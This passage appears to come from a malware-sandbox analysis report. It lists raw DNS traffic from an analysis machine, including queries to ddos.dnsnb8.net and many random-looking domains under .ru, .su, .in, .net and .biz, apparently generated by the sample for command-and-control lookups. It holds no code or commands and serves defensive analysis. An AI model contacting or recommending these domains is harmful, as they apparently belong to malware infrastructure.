                                                                                                                                                                                                                        Jul 25, 2024 15:15:21.886759996 CEST5603053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.121957064 CEST53560301.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:23.755763054 CEST6448553192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:23.766561031 CEST53644851.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:24.896142960 CEST5724153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:25.408566952 CEST53572411.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:26.551851034 CEST5446453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:26.563381910 CEST53544641.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.680366993 CEST6322853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.866024971 CEST53632281.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:29.536102057 CEST6111053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:29.547326088 CEST53611101.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:30.726440907 CEST5910453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:30.849684000 CEST53591041.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.000504971 CEST6119753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.734591961 CEST53611971.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:34.444164991 CEST5759853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:34.453625917 CEST53575981.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:35.584157944 CEST6150853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:35.817830086 CEST53615081.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:36.942497969 CEST5931353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:36.952613115 CEST53593131.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:38.067801952 CEST4981153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:38.077578068 CEST53498111.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:39.200510025 CEST6219153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:39.219974041 CEST53621911.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:40.348548889 CEST5880453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:40.361435890 CEST53588041.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:41.490008116 CEST6468853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:41.502330065 CEST53646881.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:42.629760981 CEST5930553192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:42.643661022 CEST53593051.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.770972967 CEST6049053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.970180988 CEST53604901.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.504739046 CEST4925753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.673913002 CEST53492571.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:48.599304914 CEST5120253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:48.614532948 CEST53512021.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:49.740118980 CEST4962353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:49.752501011 CEST53496231.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:50.879848957 CEST5756653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:50.916500092 CEST53575661.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:52.036026001 CEST5364353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:52.047518969 CEST53536431.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:53.162728071 CEST6496453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:53.175554991 CEST53649641.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:54.301779985 CEST5691253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:54.312077999 CEST53569121.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:55.428741932 CEST5123653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:55.440915108 CEST53512361.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.601383924 CEST5321653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.911587000 CEST5321653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.912908077 CEST53532161.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.922616005 CEST53532161.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.035763025 CEST4964853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.222551107 CEST53496481.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:00.741215944 CEST5292653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:00.752420902 CEST53529261.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:01.880450964 CEST6511253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.071814060 CEST53651121.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.676770926 CEST5316353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.870702982 CEST53531631.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:05.708499908 CEST5693853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:05.717729092 CEST53569381.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:06.833108902 CEST5218853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:06.920284986 CEST53521881.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:08.036030054 CEST5720553192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:08.047108889 CEST53572051.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.161227942 CEST5104253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.470685005 CEST5104253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.702545881 CEST53510421.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.705974102 CEST53510421.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:11.535825014 CEST5164453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:11.545438051 CEST53516441.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.661448956 CEST5580753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.850660086 CEST53558071.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:14.771421909 CEST5193453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:14.781003952 CEST53519341.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:15.896528006 CEST6476253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:15.907104969 CEST53647621.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:17.022145987 CEST5330853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:17.036204100 CEST53533081.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.161525011 CEST4964353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.470674992 CEST4964353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.547014952 CEST53496431.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.547034025 CEST53496431.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:19.661390066 CEST5812453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:19.672938108 CEST53581241.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.785829067 CEST5239253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.971801996 CEST53523921.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:23.254614115 CEST5576353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:23.268949032 CEST53557631.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:24.395832062 CEST6148153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:24.421735048 CEST53614811.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:25.536344051 CEST6109453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:25.547086954 CEST53610941.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:26.661854029 CEST5746353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:26.699956894 CEST53574631.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:27.818262100 CEST5138753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:27.854243994 CEST53513871.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:28.989650011 CEST5920153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.299026966 CEST5920153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.667366028 CEST53592011.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.667426109 CEST53592011.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:31.676738024 CEST6092553192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:31.708091974 CEST53609251.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:32.832775116 CEST6123353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:32.867100000 CEST53612331.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:33.988774061 CEST5021653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:34.064666033 CEST53502161.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:35.193286896 CEST6101653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:35.205379009 CEST53610161.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.332726002 CEST5845053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.356127977 CEST53584501.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:58.976277113 CEST5470053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:16:59.144759893 CEST53547001.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.271507025 CEST5142353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.581366062 CEST5142353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.713849068 CEST53514231.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.714055061 CEST53514231.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:01.832855940 CEST5187753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:02.146177053 CEST5187753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.146320105 CEST5187753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.151489019 CEST53518771.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.154779911 CEST53518771.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.156706095 CEST53518771.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.270579100 CEST6373153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.484365940 CEST53637311.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:06.379900932 CEST5957453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:06.430552959 CEST53595741.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.552309036 CEST6094653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.861299038 CEST6094653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.928505898 CEST53609461.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.928594112 CEST53609461.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:11.082887888 CEST5820753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:11.092981100 CEST53582071.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.207854033 CEST6070053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.517626047 CEST6070053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.584923029 CEST53607001.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.584997892 CEST53607001.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:13.713542938 CEST5854453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:13.724020958 CEST53585441.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:16.928518057 CEST6082653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:16.942445040 CEST53608261.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:19.942061901 CEST4931753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:19.954668045 CEST53493171.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:21.083864927 CEST5160053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:21.095153093 CEST53516001.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:22.225972891 CEST5455653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:22.272984982 CEST53545561.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:23.415957928 CEST5924553192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:23.427980900 CEST53592451.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:24.552949905 CEST5351753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:24.569910049 CEST53535171.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:28.536509037 CEST6067153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:17:28.697144032 CEST53606711.1.1.1192.168.2.6
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.352777958 CEST192.168.2.61.1.1.10xf2a9Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:40.199372053 CEST192.168.2.61.1.1.10x350Standard query (0)ssofhoseuegsgrfnu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.218578100 CEST192.168.2.61.1.1.10x350Standard query (0)ssofhoseuegsgrfnu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.547554970 CEST192.168.2.61.1.1.10xe56fStandard query (0)ww88.ssofhoseuegsgrfnu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:06.944644928 CEST192.168.2.61.1.1.10xaaacStandard query (0)slpsrgpsrhojifdij.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:29.647766113 CEST192.168.2.61.1.1.10xef23Standard query (0)aiiaiafrzrueuedur.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:39.145549059 CEST192.168.2.61.1.1.10xbe91Standard query (0)fuaiuebndieufeufu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:40.316734076 CEST192.168.2.61.1.1.10xe39bStandard query (0)eiifngjfksisiufjf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:41.801616907 CEST192.168.2.61.1.1.10xf43bStandard query (0)eoroooskfogihisrg.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:42.973072052 CEST192.168.2.61.1.1.10x193aStandard query (0)noeuaoenriusfiruu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:44.191970110 CEST192.168.2.61.1.1.10x1f52Standard query (0)iuirshriuisruruuf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:45.584778070 CEST192.168.2.61.1.1.10x128eStandard query (0)afeifieuuufufufuf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:46.973747969 CEST192.168.2.61.1.1.10xb3afStandard query (0)srndndubsbsifurfd.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.161391020 CEST192.168.2.61.1.1.10xabd9Standard query (0)fiiauediehduefuge.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:50.240822077 CEST192.168.2.61.1.1.10xf091Standard query (0)nousiieiffgogogoo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:51.443193913 CEST192.168.2.61.1.1.10x71a1Standard query (0)fifiehsueuufidhfi.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:52.646769047 CEST192.168.2.61.1.1.10xc6b9Standard query (0)eofihsishihiursgu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:53.818129063 CEST192.168.2.61.1.1.10xe295Standard query (0)nnososoosjfeuhueu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.036415100 CEST192.168.2.61.1.1.10x676bStandard query (0)ssofhoseuegsgrfnj.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:00.365200996 CEST192.168.2.61.1.1.10x7a0eStandard query (0)slpsrgpsrhojifdij.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:01.536808968 CEST192.168.2.61.1.1.10x72e0Standard query (0)aiiaiafrzrueuedur.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:02.739101887 CEST192.168.2.61.1.1.10x313fStandard query (0)fuaiuebndieufeufu.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:04.004798889 CEST192.168.2.61.1.1.10x6e37Standard query (0)eiifngjfksisiufjf.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:05.223871946 CEST192.168.2.61.1.1.10xb8edStandard query (0)eoroooskfogihisrg.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:06.395818949 CEST192.168.2.61.1.1.10xa674Standard query (0)noeuaoenriusfiruu.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:07.569322109 CEST192.168.2.61.1.1.10x7fb1Standard query (0)iuirshriuisruruuf.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:08.770872116 CEST192.168.2.61.1.1.10x3fd7Standard query (0)afeifieuuufufufuf.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:14.560338974 CEST192.168.2.61.1.1.10x8162Standard query (0)srndndubsbsifurfd.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:15.741241932 CEST192.168.2.61.1.1.10xae44Standard query (0)fiiauediehduefuge.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:16.946208954 CEST192.168.2.61.1.1.10xae2bStandard query (0)nousiieiffgogogoo.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:18.145437956 CEST192.168.2.61.1.1.10xe3fbStandard query (0)fifiehsueuufidhfi.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:19.317435980 CEST192.168.2.61.1.1.10x66beStandard query (0)eofihsishihiursgu.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:20.541022062 CEST192.168.2.61.1.1.10xa40Standard query (0)nnososoosjfeuhueu.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:21.886759996 CEST192.168.2.61.1.1.10x4783Standard query (0)ssofhoseuegsgrfnj.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:23.755763054 CEST192.168.2.61.1.1.10x820eStandard query (0)slpsrgpsrhojifdij.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:24.896142960 CEST192.168.2.61.1.1.10x3195Standard query (0)aiiaiafrzrueuedur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:26.551851034 CEST192.168.2.61.1.1.10x60b8Standard query (0)fuaiuebndieufeufu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.680366993 CEST192.168.2.61.1.1.10xbbf0Standard query (0)eiifngjfksisiufjf.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:29.536102057 CEST192.168.2.61.1.1.10x5887Standard query (0)eoroooskfogihisrg.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:30.726440907 CEST192.168.2.61.1.1.10x1ee1Standard query (0)noeuaoenriusfiruu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.000504971 CEST192.168.2.61.1.1.10x1235Standard query (0)iuirshriuisruruuf.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:34.444164991 CEST192.168.2.61.1.1.10x52c2Standard query (0)afeifieuuufufufuf.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:35.584157944 CEST192.168.2.61.1.1.10x6f4dStandard query (0)srndndubsbsifurfd.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:36.942497969 CEST192.168.2.61.1.1.10x2f71Standard query (0)fiiauediehduefuge.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:38.067801952 CEST192.168.2.61.1.1.10x3652Standard query (0)nousiieiffgogogoo.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:39.200510025 CEST192.168.2.61.1.1.10x90bbStandard query (0)fifiehsueuufidhfi.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:40.348548889 CEST192.168.2.61.1.1.10x3829Standard query (0)eofihsishihiursgu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:41.490008116 CEST192.168.2.61.1.1.10x4d2bStandard query (0)nnososoosjfeuhueu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:42.629760981 CEST192.168.2.61.1.1.10x4364Standard query (0)ssofhoseuegsgrfnj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.770972967 CEST192.168.2.61.1.1.10x1eadStandard query (0)slpsrgpsrhojifdij.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.504739046 CEST192.168.2.61.1.1.10x60b4Standard query (0)aiiaiafrzrueuedur.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:48.599304914 CEST192.168.2.61.1.1.10x6c65Standard query (0)fuaiuebndieufeufu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:49.740118980 CEST192.168.2.61.1.1.10x83bStandard query (0)eiifngjfksisiufjf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:50.879848957 CEST192.168.2.61.1.1.10x3c3dStandard query (0)eoroooskfogihisrg.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:52.036026001 CEST192.168.2.61.1.1.10xc6bcStandard query (0)noeuaoenriusfiruu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:53.162728071 CEST192.168.2.61.1.1.10x5404Standard query (0)iuirshriuisruruuf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:54.301779985 CEST192.168.2.61.1.1.10x5e49Standard query (0)afeifieuuufufufuf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:55.428741932 CEST192.168.2.61.1.1.10x2a3dStandard query (0)srndndubsbsifurfd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.601383924 CEST192.168.2.61.1.1.10x996bStandard query (0)fiiauediehduefuge.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.911587000 CEST192.168.2.61.1.1.10x996bStandard query (0)fiiauediehduefuge.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.035763025 CEST192.168.2.61.1.1.10x22f5Standard query (0)nousiieiffgogogoo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:00.741215944 CEST192.168.2.61.1.1.10xd5d4Standard query (0)fifiehsueuufidhfi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:01.880450964 CEST192.168.2.61.1.1.10x1a03Standard query (0)eofihsishihiursgu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.676770926 CEST192.168.2.61.1.1.10x1d26Standard query (0)ssofhoseuegsgrfnj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:05.708499908 CEST192.168.2.61.1.1.10x7254Standard query (0)slpsrgpsrhojifdij.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:06.833108902 CEST192.168.2.61.1.1.10xf629Standard query (0)aiiaiafrzrueuedur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:08.036030054 CEST192.168.2.61.1.1.10xf2b7Standard query (0)fuaiuebndieufeufu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.161227942 CEST192.168.2.61.1.1.10x42e2Standard query (0)eiifngjfksisiufjf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.470685005 CEST192.168.2.61.1.1.10x42e2Standard query (0)eiifngjfksisiufjf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:11.535825014 CEST192.168.2.61.1.1.10x63aeStandard query (0)eoroooskfogihisrg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.661448956 CEST192.168.2.61.1.1.10x9fe7Standard query (0)noeuaoenriusfiruu.bizA (IP address)IN (0x0001)false
